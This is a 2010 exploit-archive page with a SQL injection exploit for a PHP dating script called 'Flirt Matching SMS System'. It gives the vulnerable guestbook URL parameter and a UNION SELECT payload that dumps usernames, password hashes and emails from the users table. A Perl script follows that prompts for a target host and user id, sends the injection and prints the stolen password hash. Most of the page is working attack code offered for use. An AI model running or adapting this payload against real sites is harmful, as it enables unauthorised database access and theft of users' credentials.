Home / os / winme

Flirt Matching SMS System <= SQL Injection Exploit

Posted on 26 March 2010

==================================================
Flirt Matching SMS System <= SQL Injection Exploit
==================================================


----------------------------Information------------------------------------------------
+Name : Flirt Matching SMS System <= SQL Injection Exploit
+Autor : Easy Laster
+Date   : 26.03.2010
+Script  : Flirt Matching SMS System
+Download : ------------------
+Demo : http://phpspezial.de/singel/
+Price : 39,99?
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/flirt/index.php?site=guestbook&id=
 
+Exploitable   : http://www.site.com/flirt/index.php?site=guestbook&id=9999999999+union
+select+1,2,3,4,concat(id,0x3a,username,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from
+users+where+id=1
 
-----------------------------------------------------------------------------------------
 
#SQL Injection Exploit
 
#!usrinperl
#
#
##################################################
# Modules                                        #
#------------------------------------------------#    
use strict;               # Better coding.       #
use warnings;             # Useful warnings.     #
use LWP::Simple;          # procedureal interface#
##################################################
print "
##################################################
#            4004-Security-Project               #
##################################################
#    Flirt Matching SMS System SQL Injection     #
#                   Exploit                      #
#            Using Host+Path+Userid              #
#              www.demo.com /flirt/ 1            #
#  Discovered and vulnerability by Easy Laster   #
#                coded by Easy Laster            #
##################################################
a
";
my($host,$path,$userid,$request);
my($first,$block,$error,$dir);
$block = "
##################################################
";
$error = "Exploit failed";
  print "$block";
    print q(Target www.demo.com->);
    chomp($host =<STDIN>);
    if ($host eq""){
    die "$errora
"};
    print "$block";
          print q(Path /path/ ->);
          chomp($path =<STDIN>);
          if ($path eq""){
          die "$errora
";}
                 print "$block";
                 print q(userid->);
                  chomp($userid =<STDIN>);
                      if ($userid eq""){
                      die "$errora
";}
                      print "$block";
                         $dir = "index.php?site=guestbook&id=";
                         print "<~> Exploiting...
";
                         $host = "http://".$host.$path;
                           print "<~> Connecting...
";
                           $request = get($host.$dir."9999999999+union+select+1,2,3,4,concat(password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+where+id=".$userid."--");
                       $first = rindex($request,"G?stebuch von");
                       if ($first != -1)
                       {
               print "<~> Exploiting...
";
               print "$block
";
         $request = substr($request, $first+14, 34);
         print "<~> Hash = $request

a";
       }
       else
     {
   print "<~> $error";
}


# Inj3ct0r.com [2010-03-26]

 

TOP

Malware :

Exploits :